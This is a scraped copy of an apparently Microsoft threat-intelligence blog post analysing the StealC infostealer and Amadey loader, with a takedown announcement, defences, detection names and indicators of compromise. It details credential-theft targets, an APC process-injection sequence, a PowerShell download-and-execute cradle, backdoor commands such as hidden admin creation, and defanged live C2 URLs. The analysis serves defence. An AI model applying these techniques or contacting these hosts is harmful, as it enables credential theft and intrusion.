{“lastseen”:”2026-06-24T12:57:12″,”description”:”In this article\\n\\n 1. The role of infostealers: From credential theft to intrusion\\n 2. StealC: Infostealer for rent\\n 3. Amadey: Malware-as-a-service for delivery of infostealers\\n 4. Defending against StealC and Amadey intrusions\\n 5. Microsoft Defender detections\\n 6. Indicators of compromise\\n\\n\\n\\nInfostealers continue to be some of the most pervasive and impactful threats across the cybercrime ecosystem. They play a central role in intrusions, silently harvesting passwords, cookies, and session tokens before exfiltrating stolen data to attacker-controlled infrastructure. If not mitigated, these threats can turn a single consumer-device compromise into an enterprise risk: an infostealer infection on an employee’s personal device could yield corporate virtual private network (VPN) credentials, single sign-on (SSO) tokens, and session cookies that could allow an attacker to bypass multifactor authentication (MFA). \\n\\nIn the cybercriminal ecosystem, infostealer families like StealC and malware delivery services like Amadey are sold and rented as commodities. Stolen data flows through an underground economy of access brokers that feeds ransomware and other operations. Because the initial infection usually happens outside managed endpoints, defenders might see the breach only after valid credentials are abused, underscoring the importance of identity protection, credential hygiene, and rapid response. \\n\\nIn this blog, we examine how the infostealer economy has grown into a major threat to enterprise security, with a focus on StealC and Amadey. StealC is an infostealer that collects sensitive data from browsers, cryptocurrency wallets, messaging applications, email clients, and gaming platforms. It is a malware-as-a-service (MaaS) offering that threat actors use to generate customized payloads and manage stolen data through a centralized web panel. Meanwhile, Amadey is a MaaS loader that threat actors use to deliver StealC and other malware. Modular, pay-as-you-go models like StealC and Amadey allow threat actors to use a single initial infection to quickly escalate into multiple other threats.\\n\\nOn June 24, 2026, Microsoft\u2019s Digital Crimes Unit (DCU), working with Europol and industry partners, announced a coordinated disruption action resulting in the takedown, suspension, and blocking of domains and command-and-control (C2) servers that formed the backbone of StealC and Amadey infrastructure. In total, DCU identified over 200 malicious Amadey and StealC command-and-control domains and IPs and moved to shut them down through a mix of court orders, domain seizures, registrations, and provider notifications.As part of this disruption, DCU engineered tools, including the use of Microsoft Copilot, to analyze StealC and Amadey binaries efficiently. These efforts included creating a prompt agent for performing comprehensive analysis of functions, using prompt engineering to generate a Python script for string decryption and extraction of configuration parameters, using Copilot to analyze disassembled malware code and identify C2 servers hardcoded into the malware binaries, and writing software with assistance from Copilot to confirm C2 activity. \\n\\n## The role of infostealers: From credential theft to intrusion\\n\\nInfostealers like StealC, Lumma Stealer, RedLine, Raccoon, and Vidar enable division of labor across the cybercriminal ecosystem: initial operators deploy the malware at scale, and access brokers validate and monetize the stolen credentials, then resell them at a premium to threat actors seeking a foothold into enterprise environments.\\n\\nWhen successfully deployed and executed, information-stealing malware can harvest credentials (usernames, passwords, and session cookies) from infected environments and export them as logs to the attackers’ server. These logs can hold credentials and tokens present on the compromised device, including corporate VPN, email, cloud, and SSO accounts. Stolen corporate credentials are extremely valuable, because a single working account can unlock many enterprise systems at once, especially if MFA could be bypassed using stolen session cookies. \\n\\n### How an infostealer attack unfolds\\n\\nWhile individual families differ in their tradecraft, infostealer-enabled intrusions follow a remarkably consistent path from delivery to impact. The infection chain could begin on an unmanaged or lightly protected device and end, often weeks later, inside a corporate environment, using credentials that look entirely legitimate.\\n\\n_Figure 1. A generalized end-to-end flow common to modern information-stealing malware, from initial lure through credential theft to downstream enterprise impact._\\n\\nInfostealer operators favor delivery techniques that scale and rely on ordinary user behavior rather than software vulnerabilities. The most common is deceptive web traffic: search engine optimization (SEO) poisoning and malicious advertising push fake or trojanized versions of popular software, \\”cracked\\” applications, and game cheats to the top of search results. A user looking for a free utility downloads a working program bundled with a stealer. A fast-growing variant is the ClickFix technique, in which a website tricks users into pasting a command into the Windows Run dialog or terminal, unknowingly executing the attacker’s script themselves, sidestepping many download-based defenses. Phishing email remains a reliable delivery path as well, particularly for campaigns that target specific organizations or individuals.\\n\\nLastly, infostealers are frequently delivered by other malware. Loaders like Amadey, upon establishing a foothold, deploy a stealer, a banking trojan, or additional tooling on demand. Once the loader unpacks the infostealer in memory and evades detection, the infostealer harvests target data. After exfiltrating stolen data, the malware typically deletes itself to hinder investigation. As we discuss in the next section, stolen credentials and tokens rarely stay with the original operator. These are packaged into logs and sold, validated by intermediaries, and eventually monetized as enterprise access, enabling account takeover, fraud, and ransomware.\\n\\n### How stolen credentials are monetized\\n\\nOnce exfiltrated, infostealer logs are rapidly monetized. Within hours, credentials from infected devices often appear on dark web markets or Telegram channels for USD $10-50 per log, while premium logs (with bank or corporate accounts) fetch higher prices, up to $100+ each. However, recent analysis by researchers at Reliaquest shows that Russian markets selling logs as low as $2 per log. These \u201cbreach packages\u201d might be purchased in bulk by initial access brokers, specialized intermediaries who test and resell network access.\\n\\nAlternatively, the operators who originally stole the logs themselves might directly exploit the high-value credentials without involving an access broker or buyer. For example, some ransomware groups deploy infostealers and then use the captured credentials to get inside target networks. The timeline for stolen infostealer credentials turning into enterprise breaches varies widely. Some intrusions occur within 48\u201372 hours of credentials being stolen, while other stolen credentials could sit dormant for months before they\u2019re used by an attacker.\\n\\nInfostealer infections often occur outside managed networks, for example, an employee\u2019s home PC where corporate security monitoring is absent. The stolen sign-in reuse might not raise immediate alarms because attackers authenticate with legitimate credentials, even bypassing MFA if they have a session cookie. As a result, many compromised organizations only discover malicious activity after the attacker has taken action (for example, ransomware deployment or a large-scale data exfiltration event). This stealthy progression could make infostealer-driven intrusions a challenge to detect in time.\\n\\n_Figure 2. Sample infostealer to ransomware attack chain_\\n\\n## StealC: Infostealer for rent\\n\\nStealC is representative of the modern malware-as-a-service stealer: threat actors rent access to a StealC builder to produce customized samples and a web panel to manage stolen data. This model keeps the barrier to entry low and the volume of distinct samples high. StealC is written in C++. Upon execution, it fingerprints the compromised system, collects saved credentials and cookies from a wide range of browsers, targets cryptocurrency wallets and messaging applications, captures data from email clients, steals Steam session data, takes screenshots of desktop, and exfiltrates credentials to its C2 server.\\n\\nThe malware also functions as a secondary loader, capable of downloading and executing additional payloads (_.exe_ , MSI, or PowerShell scripts) on command from the C2. After completing its tasks, the malware can optionally self-delete to reduce forensic evidence. In addition, StealC queries the system’s default language and runs a language check, terminating itself if the locale matches Russian, Ukrainian, Belarusian, Kazakh, or Uzbek.\\n\\n_Figure 3. Distribution of StealC infections from May 15-June 15, 2026_\\n\\nThe malware attempts to create a Windows event using the victim ID as the event name. The victim ID format is _\\u003c computer name\\u003e_\\u003cusername\\u003e_. If the event already exists, the malware enters a polling loop at intervals of less than five seconds (varies across variants) until the previous instance of itself completes. This is to avoid having multiple running instances on the device. StealC also contains an embedded expiration date. It compares the current system time against this expiration date and skips all malicious activity if the sample has expired.\\n\\n### C2 registration and configuration\\n\\nStealC first sends a registration request to the C2 panel and constructs an HTTP POST request containing:\\n\\n * Request type: create\\n * System hardware ID\\n * Malware build ID\\n\\n\\n\\nThis payload is RC4-encrypted using a hard-coded key, Base64-encoded, and then sent to the C2 through HTTP POST request. The decrypted C2 response is parsed as a JSON configuration object containing the following information:\\n\\n * An access token used to authenticate all subsequent requests from the malware\\n * A list of browser stealing targets (paths, browser types, methods and types, which data to extract)\\n * A list of file-grabbing rules (target directories, file masks, size limits, recursion depth)\\n * Configuration flags controlling optional modules, including screenshot capture (_take_screenshot_), loader execution (_loader_), Steam theft (_steal_steam_), Outlook theft (_steal_outlook_), Foxmail theft (_steal_foxmail_), WinSCP theft (_steal_winscp_), and self-deletion (_self_delete_)\\n\\n\\n\\nIf this registration with C2 fails, the malware self-terminates immediately.\\n\\nStealC performs a comprehensive collection of system information that is exfiltrated to the C2:\\n\\n * Network information: IP address and country\\n * System identifiers: HWID, OS version and build number, system architecture\\n * User context: Username, computer name, running executable path\\n * Locale data: Local time, UTC offset, system language, installed keyboard layouts\\n * Hardware profile: CPU model, core and thread count, total RAM, battery\/laptop detection\\n * Display configuration: Virtual screen resolution, monitor details (device name, adapter string, resolution, color depth)\\n * GPU information: Graphics adapter details\\n * Running processes: Full process list with names and PIDs enumerated through _toolhelp_ snapshots\\n * Installed software: Application names and versions from the _Uninstall_ registry keys for both all-users and current-user hives\\n\\n\\n\\n### Browser credential stealing\\n\\nFor Chromium browsers (like Chrome, Edge, Brave, Opera, Vivaldi, and others), the malware resolves the browser’s profile directory under _%APPDATA%_ or _%LOCALAPPDATA%_ and targets the following data stores:\\n\\n * Sign-in data: saved user names and passwords\\n * Cookies: session cookies\\n * Web data: autofill entries and saved credit card information\\n * History: browsing history\\n * Local extension settings\/Sync extension settings\/IndexedDB: browser extension data (including cryptocurrency wallet extensions)\\n\\n\\n\\nTo defeat Chromium’s App-Bound Encryption (ABE), StealC does not decrypt these browser secrets within its own process. Instead, it carries an embedded payload (approximately 165 KB) that it injects into a sacrificial suspended process and executes through an asynchronous procedure call (APC). The injection sequence is as follows:\\n\\n 1. Spawns the target process with _CreateProcessA_ using the CREATE_SUSPENDED flag\\n 2. Allocates executable memory in the remote process with _VirtualAllocEx_ (MEM_COMMIT, PAGE_EXECUTE_READWRITE).\\n 3. Writes the embedded payload into that memory with _WriteProcessMemory_.\\n 4. Queues the payload to the suspended thread with _QueueUserAPC_ , then calls _ResumeThread_ , so the APC fires and the payload runs in the process context\\n 5. Waits for the injected code to finish with _WaitForSingleObject_ , then frees the memory and closes the handles\\n\\n\\n\\nRunning in the target process context, the injected module performs the in-process decryption and writes the cleartext result to an inter process communication (IPC) file at _C:\\\\ProgramData\\\\ \\u003cHWID\\u003e.txt_, where _\\u003c HWID\\u003e_ is the victim hardware identifier. StealC then reads back up to 511 bytes of decrypted output from that file, processes the result, and deletes the temporary file. The routine retries the injection up to three times if it does not succeed.\\n\\nThe decrypted credential data is formatted as plaintext entries with fields for URL, login, and password, and is then exfiltrated to C2. For Firefox and other Gecko-based browsers (like Thunderbird, Waterfox, and others), the malware locates the _profiles.ini_ to identify active browser profiles, then extracts data from the following:\\n\\n * _logins.json_ : stored credentials (hostname, encrypted user name, encrypted password)\\n * _cookies.sqlite_ : session cookies\\n * _formhistory.sqlite_ : form autofill data\\n * _places.sqlite_ : browsing history and bookmarks\\n\\n\\n\\n### Additional credential theft activity\\n\\nBeyond web browsers, StealC targets credentials saved by several desktop applications, processing each module in order and sending the results to the C2 as it completes them.\\n\\nStealC enumerates Microsoft Outlook email account profiles stored in the registry under _HKCU\\\\Software\\\\Microsoft\\\\Office\\\\ \\u003cversion\\u003e\\\\Outlook\\\\Profiles_ and _HKCU\\\\Software\\\\Microsoft\\\\Windows Messaging Subsystem\\\\Profiles_. It reads the account values for each profile, including the server settings and user names, and recovers the saved account passwords from their stored encrypted form so that mail server credentials (IMAP, POP3, and SMTP) could be exfiltrated.\\n\\nThe malware also targets the Foxmail email client. It locates the Foxmail data directory and parses account storage files (for example, the _Accounts_ records under each account’s _Storage_ folder). It then extracts the configured email addresses, server details, and saved passwords, decrypting Foxmail’s proprietary password encoding to recover the credentials in plaintext.\\n\\nFor the WinSCP File Transfer Protocol (FTP) and SSH FTP (SFTP) client, the malware collects saved session credentials from either the registry key _HKCU\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions_ or, when portable storage is used, the _WinSCP.ini_ file. For each session, it recovers the host name, user name, and password, reversing WinSCP’s custom password obfuscation so the stored credentials could be exfiltrated.\\n\\nTo perform file grabbing, the malware processes a list of rules received from the C2. Each rule specifies a target directory, file mask patterns, recursion depth, and optional size limits. The grabber uses recursive directory enumeration to walk the target path. Selected files are copied to a staging directory under _C:\\\\ProgramData_ and read into memory to be exfiltrated to C2. The temporary copy is then deleted.\\n\\nIf enabled in the C2 configuration, the malware specifically targets the Steam gaming application. First, it retrieves the Steam path from the registry key _HKCU\\\\SOFTWARE\\\\Valve\\\\Steam_ and then navigates to the configuration subdirectory inside and collects the following files:\\n\\n * _ssfn*_\\n * _config.vdf_\\n * _DialogConfig.vdf_\\n * _DialogConfigOverlay*.vdf_\\n * _libraryfolders.vdf_\\n * _loginusers.vdf_\\n\\n\\n\\nIf enabled by the C2 configuration, the malware can also capture a full screenshot of the victim’s desktop using the following operations:\\n\\n 1. Obtains the virtual screen dimensions (spanning all monitors)\\n 2. Performs a screen capture using a device context and bit-block transfer\\n 3. Encodes the captured bitmap as a JPEG image at 90% quality\\n 4. Exfiltrates the result\\n\\n\\n\\nAfter data collection is complete, the malware contacts the C2 again with request type _loader_ while authenticating with the previously received access token. The C2 responds with a list of payloads to download and execute. The following three execution methods are supported:\\n\\n * EXE execution: Downloads a file, saves it with an _.exe_ extension, and executes the payload\\n * PowerShell cradle: Constructs a download-and-execute command _(iwr \\u003cURL\\u003e |iex)_ and launches it through PowerShell\\n * MSI installation: Downloads a file, saves it with an _.msi_ extension, and installs it silently through _msiexec.exe \/i \\”\\u003cpath\\u003e\\” \/passive_\\n\\n\\n\\nAfter all stealing modules have finished, the malware sends a final _done_ notification to the C2 panel, including the access token. This signals to the operator that data collection for the compromised device is complete. All stolen data, such as system information, browser credentials, grabbed files, and screenshots, are transmitted in individual POST requests throughout the execution flow, each being RC4-encrypted and Base64-encoded. If the self-delete flag is set in the C2 configuration, the malware removes itself from disk as its final operation by executing the following command:\\n\\n\\n\\n## Amadey: Malware-as-a-service for delivery of infostealers\\n\\nActive since at least 2018, Amadey operates as a malware-as-a-service (MaaS) that has been used as a delivery mechanism for downstream malware such as StealC, Lumma Stealer, remote access trojans (RATs), crypto miners, and, in some cases, ransomware.\\n\\n_Figure 4. Distribution of Amadey infections from May 15 to June 15, 2026_\\n\\nIn December of 2025, researchers at Trellix reported threat actors using the Amadey loader to retrieve the StealC infostealer from a compromised self-hosted GitLab instance, rather than from more familiar public hosting like GitHub. The point of that approach was to make the delivery infrastructure look more legitimate by using a long-established domain with valid TLS certificates, which can help the activity blend in and evade some traditional defenses.\\n\\nThis attack chain began with the first-stage Amadey loader. Once executed, the loader created a mutex to prevent duplication, performed discovery actions, and began communicating with its C2 server. Follow-on activities included the execution of additional components including a clipper plugin, use of PowerShell to expand archived payloads, deployment of additional payloads, and the execution of StealC, which communicated with its own separate C2 infrastructure after execution.\\n\\nAmadey predates the current infostealer boom but has found renewed relevance as a delivery mechanism. It is a modular backdoor written in C++. It communicates with its C2 server over HTTP and supports backdoor commands for file download, file execution, command execution, modular updates, and network proxy. Operators can push plugins that add capabilities such as credential and clipboard theft, or simply use Amadey to download and run other malware, including infostealers. \\n\\n### Scheduled task persistence\\n\\nUpon execution, Amadey attempts to copy itself to the file _nudwee.exe_ in the following target directory, depending on the system:\\n\\n * On Windows 10 or Windows 11: _C:\\\\Users\\\\ \\u003cuser name\\u003e\\\\e079729711_\\n * Others: _%TEMP%\\\\e079729711_\\n\\n\\n\\nAfter copying its own executable to this path, the malware executes it before creating a scheduled task to establish persistence for the payload.\\n\\n### System information collection\\n\\nThe malware builds a victim fingerprint POST request body with the following fields:\\n\\n**Field**| **Description** \\n—|— \\nid:| Bot ID \\nvs:| Version (\\”5.34\\”) \\nsd:| SD identifier (\\”8ac688\\”) \\nos:| OS version \\nbi:| Bitness (32\/64-bit) \\nar:| Admin rights \\npc:| Computer name \\nun:| User name \\ndm:| Domain name \\nav:| Installed antivirus products \\nlv:| Level (\\”0\\”) \\nog:| File size flag \\n \\nThis body is then RC4-encrypted and hex-encoded and later sent to C2 during the C2 bot registration phase.\\n\\nThe malware continues its infection by querying the system registry for keyboard layouts. The malware specifically checks for the following layout IDs:\\n\\n * 00000419: Russian\\n * 00000422: Ukrainian\\n * 00000423: Belarusian\\n\\n\\n\\nThis sets up an internal flag, which is checked before executing certain commands to skip certain functionalities like credential stealing and clipboard stealing.\\n\\n### C2 communication\\n\\nThe malware communicates with its C2 serverover HTTP. In the first phase, the malware performs a status check by sending \\”_st=s_ \\”in an HTTP POST request to C2. The C2 server responds with a sleep multiplier, which is a value to specify how long the malware sleeps between command execution.\\n\\nIn the next phase, the malware performs bot registration by sending the RC4-encrypted victim information to the C2. Once this is complete, the C2 starts sending backdoor commands to the Amadey backdoor. After each backdoor command is executed, the malware sleeps for the specified duration before receiving a new backdoor command. All communications between the malware and its C2 infrastructure are encrypted using RC4, with the encryption key embedded in the malware’s configuration.\\n\\nThe following table lists the backdoor commands that Amadey could process and their descriptions:\\n\\n**Backdoor code**| **Name**| **Description** \\n—|—|— \\n0x0A (10)| Drop EXE| Downloads file from a URL, saves it as _.exe_ , executes the payload \\n0x0B (11)| Drop DLL| Downloads a _.dll_ file, loads it through _rundll32.exe_ to execute the payload \\n0x0C (12)| Execute CMD| Runs a command through _cmd.exe_ \\n0x0D (13)| Download and inject| Downloads a payload from a URL, performs process injection to execute; retries once with 1s delay \\n0x0E (14)| Execute PS1| Downloads and executes a PowerShell script (_.ps1_) \\n0x0F (15)| SOCKS proxy START| Receives target address, sets proxy flag, and spawns background thread running SOCKS relay loop \\n0x10 (16)| SOCKS proxy STOP| Disables proxy flag to terminate relay loop and tears down proxy \\n0x12 (18)| Self-update (rename)| – Compares local binary size against server threshold; if a newer version is available, self-updates by downloading a new executable from the C2, renaming the old binary with the new one, and executes it \\n0x13 (19)| Self-uninstall| Removes scheduled task, writes _RunOnce_ registry key to execute _cmd \/C RMDIR \/s\/q C:\\\\Users\\\\ \\u003cuser name\\u003e\\\\e079729711_ to delete the malware folder on reboot, self-terminates \\n0x14 (20)| Capture and exfiltrate screenshot| – Captures a screenshot, saves it as JPG in the system temporary directory using the victim’s unique unit ID as the filename, and uploads it to the C2 server through an HTTP multipart\/form-data POST request (?scr=1), sending the image as the data field **- **To improve reliability, attempts up to three screenshot uploads using different configured C2 servers; once the upload process completes, the temporary JPG file is deleted from disk \\n0x15 (21)| Steal credentials| Downloads and loads _cred.dll_ plugin from C2 _\/Plugins\/_ path through _rundll32.exe_ _cred.dll_ , _Main_ \\n0x16 (22)| Steal clipboard| Downloads and loads _clip.dll_ plugin through _rundll32.exe_ _clip.dll_ , _Main_ \\n0x17 (23)| VNC \/ Remote access| Downloads VNC plugin manifest from C2, parses for up to 3 component files, downloads and installs each on the infected machine \\n0x18 (24)| Enable RDP| – Enables Remote Desktop by allowing inbound RDP connections to the host system – Sets _fDenyTSConnections=0_ in registry – Executes system commands to enable the Remote Desktop firewall rule, configure the Terminal Services to auto-start, and launch the service; this ensures RDP access is both permitted through the firewall and persistently available across reboots \\n0x19 (25)| Create hidden admin| – Extracts credentials from backdoor data to create a new local user account, then escalates it by adding the account to the Administrators group to ensure full system privileges – Disables password expiration and preventing password changes on this admin account \\n0x1A (26)| Russian system check| Confirms if Amadey is running on a Russian system \\n0x1B (27)| Drop MSI| Downloads _.msi_ file, installs with _\/quiet_ flag \\n0x1C (28)| Execute CMD (elevated)| Runs command via _cmd.exe_ with elevated privilege \\n0x1D (29)| Drop EXE (elevated)| Downloads _.exe_ , executes with elevated privilege \\n \\nPlugins like _cred.dll_ and _clip.dll_ are downloaded from the C2 server at runtime.\\n\\nIn the generic handler used by commands 0x0A, 0x0C, 0x1B, 0x1C, 0x1D, the C2 can specify one of these in the backdoor data for the payload drop location:\\n\\n**Value**| **Location** \\n—|— \\n0| AppData (_%APPDATA%_) \\n1| Temp (_%TEMP%_) \\n2| User Profile (_%USERPROFILE%_) \\n3| Desktop \\n \\n## Defending against StealC and Amadey intrusions\\n\\nTo defend against attacks from infostealers like StealC and malware families like Amadey, Microsoft recommends the following mitigation measures:\\n\\n * Read the human-operated ransomware threat overview for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening recommendations.\\n * Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\\n * Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.\\n * Turn on tenant-wide tamper protection features to prevent attackers from stopping security services or using antivirus exclusions. Without tamper protection, attackers could simply turn off Microsoft Defender Antivirus without the need to acquire higher privileges.\\n * Customers running Intune or Microsoft Defender for Endpoint Security Configuration can enable _DisableLocalAdminMerge_ to prevent modification of antivirus exclusions via GPO.\\n * In addition to tamper protection, you can also enable and configure Microsoft Defender Antivirus always-on protection in Group Policy.\\n * If there is an issue with a device during roll out of various antivirus features, the device can be placed in troubleshooting mode to turn off tamper protection temporarily without impacting the wider organizational security policy.\\n * Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent several of the infection vectors of this threat. These rules, which can be configured by any user, offer significant hardening against targeted attacks. In observed attacks, Microsoft customers who had the following rules turned on could mitigate the attack in the initial stages and prevent hands-on-keyboard activity: \\n * Use advanced protection against ransomware\\n\\n\\n\\n## Microsoft Defender detections\\n\\nMicrosoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.\\n\\n**Tactic** | **Observed activity** | **Microsoft Defender coverage** \\n—|—|— \\nPersistence| Threat actors distributed malware families| **Microsoft Defender for Antivirus** \\n- Trojan:Win32\/Amadey \\n- Trojan:Win64\/Amadey \\n- Trojan:MSIL\/Amadey \\n- Trojan:PowerShell\/Amadey \\n- Behavior:Win64\/Amadey \\n- Behavior:Win32\/Amadey \\n- TrojanDownloader:Win32\/Amadey \\n- TrojanDownloader:Win64\/Amadey \\n- TrojanDownloader:PowerShell\/Amadey \\n- TrojanDownloader:MSIL\/Amadey \\n- TrojanDownloader:Win64\/Stealc \\n- TrojanDownloader:VBS\/StealC \\n- TrojanDownloader:PowerShell\/StealC \\n- TrojanDownloader:MSIL\/StealC \\n- Trojan:Win64\/Stealc \\n- Trojan:Win32\/Stealc \\n- Trojan:MSIL\/Stealc \\n- Behavior:Win64\/Stealc \\n \\n**Microsoft Defender for Endpoint** \\n- \u2018Amadey\u2019 malware was prevented \\n- \u2018StealC\u2019 malware was prevented \\n- User account created under suspicious circumstances \\n- New group added suspiciouslyInformation stealing malware activity \\nImpact| Threat actors can deploy ransomware| **Microsoft Defender for Endpoint** \\n- Ransomware-linked threat actor detected \\n- A file or network connection related to a ransomware-linked emerging threat activity group detected \\n \\n### Microsoft Security Copilot\\n\\nMicrosoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.\\n\\nCustomers can also deploy AI agents, including the following Microsoft Security Copilot agents, to perform security tasks efficiently:\\n\\n * Threat Intelligence Briefing agent\\n * Phishing Triage agent\\n * Threat Hunting agent\\n * Dynamic Threat Detection agent\\n\\n\\n\\nSecurity Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.\\n\\n### Threat intelligence reports\\n\\nMicrosoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.\\n\\n * Tool profile: Amadey\\n * Tool profile: StealC\\n * Tool profile: Lumma Stealer\\n * Tool profile: Information stealers\\n\\n\\n\\nMicrosoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.\\n\\n## Indicators of compromise\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\n8f32456359f209a63adfd24b94235e1727382ac7f7bb7f2bcaf754e721925b64| SHA-256| StealC \\n0215f734867bd71c57ff5c524d8cc670be5b4f1861b2c390cf46d18784a53624| SHA-256| StealC \\n2a0f053855da59b3b56812e580d7baeba59fc9493694722aa9e3f121ee3363f1| SHA-256| StealC \\n977b33a9b481cf714946b7d386865cd5d284312aa5ecfa0546c197b1003e1bde| SHA-256| StealC \\nb7d1f172ff3feafe65d47fd1cbe0cc249316371ae0e1cbe3a7c741c738b3353d| SHA-256| Amadey 5.87 \\n9383572a30ae5b76fadd0700fbd7a1aa7b05d0b6c8f9cdaef9b30a3e1f65d57d| SHA-256| Amadey 5.86 \\n5f5b25b2e35d404034d0d60975cf1ffbc6f141761ec3f4f15d6f7c6213a056f6| SHA-256| Amadey 5.80 \\n98e504cc7125b79eda5491f40b998605a05f4cd968b961aab4cce7beb074fefe| SHA-256| Amadey 5.78 \\n30cef3d3d956e83e2c50579cfbe57a49159cccbcc8b0b0422f27d55e1c401ad9| SHA-256| Amadey 5.77 \\n8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea| SHA-256| Amadey 5.73 \\n99507f18c4e61fdb109805404bf6a79ea8ce2fddc590ce48d717e97516ab7e8d| SHA-256| Amadey 5.70 \\n1246c5b89ab668c1137f377507bc3e266a98e93248382aa026610ae1e764a497| SHA-256| Amadey 5.65 \\nd43c988d6f9cb355497696b580621fb1bdb7b6ed6d90f97520ecf6da5a1a41ff| SHA-256| Amadey 5.64 \\nca4d4c4fc3e5d5cfa922b898f2d7411f03a446dddb139ba45dfd4f8f0018b64f| SHA-256| Amadey 5.63 \\n43455f1ff4a623b783da670d052eb77eaaacb0c66a9f1e8508f802bf22e8129e| SHA-256| Amadey 5.60 \\n _hxxp:\/\/polse[.]us\/62ea47cac2534aa18f74.php_| C2 URL| StealC C2 \\n _hxxp:\/\/roger99699[.]xyz\/425f1faf4b214434b8a3.php_| C2 URL| StealC C2 \\n _hxxp:\/\/bluescry[.]com\/01f96fd710e905ca2326.php_| C2 URL| StealC C2 \\n _hxxp:\/\/secure.controlpanel[.]asia\/330311481fe14ab99814.php_| C2 URL| StealC C2 \\n _hxxps:\/\/neltron-geltron[.]shop\/e396586b99ee49d19cc3.php_| C2 URL| StealC C2 \\n _hxxp:\/\/cdntestconnect[.]com\/ed54b97a570943999715.php_| C2 URL| StealC C2 \\n _hxxps:\/\/bartsen284[.]online\/39d9612df78e45b5a4bb.php_| C2 URL| StealC C2 \\n _hxxp:\/\/goodpanelforgoodjob[.]com\/hg8jjfSr5hy\/index.php_| C2 URL| Amadey C2 \\n _hxxp:\/\/rebustan[.]top\/gd7djkDveE2\/index.php_| C2 URL| Amadey C2 \\n _hxxp:\/\/svclsc[.]com\/ms\/index.php_| C2 URL| Amadey C2 \\n _hxxp:\/\/microsoft-telemetry[.]at\/cvdfnaFJBmC0\/index.php_| C2 URL| Amadey C2 \\n _hxxp:\/\/spasopro[.]at\/Lsge63sd3\/index.php _| C2 URL| Amadey C2 \\n \\n### References\\n\\n * Amadey Exploiting Self-Hosted GitLab to Distribute StealC Trellix\\n * HELLCAT Ransomware Group Strikes Again: Four New Victims Breached via Jira Credentials from Infostealer Logs InfoStealers by HudsonRock\\n * The Infostealer Pipeline How Russian Market Fuels Credential Based Attacks ReliaQuest\\n * Stealer Logs and Corporate Access Flare\\n\\n\\n\\n### Learn more\\n\\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.\\n\\nTo get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.\\n\\nTo hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.\\n\\nThe post StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver them appeared first on Microsoft Security Blog.”,”published”:”2026-06-24T12:30:00″,”modified”:”2026-06-24T12:30:00″,”type”:”mssecure”,”title”:”StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver them”,”source”:””,”references”:””,”id”:”MSSECURE:60CA4794B9C1C6FE86B9F6D8449FB809″,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/06\/24\/stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them\/”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-24T12:57:12″,”description”:”In this article\\n\\n 1. The role of infostealers: From credential theft to intrusion\\n 2. StealC: Infostealer for rent\\n 3. Amadey: Malware-as-a-service for delivery of infostealers\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,110,13,33,7,11,5],"class_list":["post-65365","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-mssecure","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n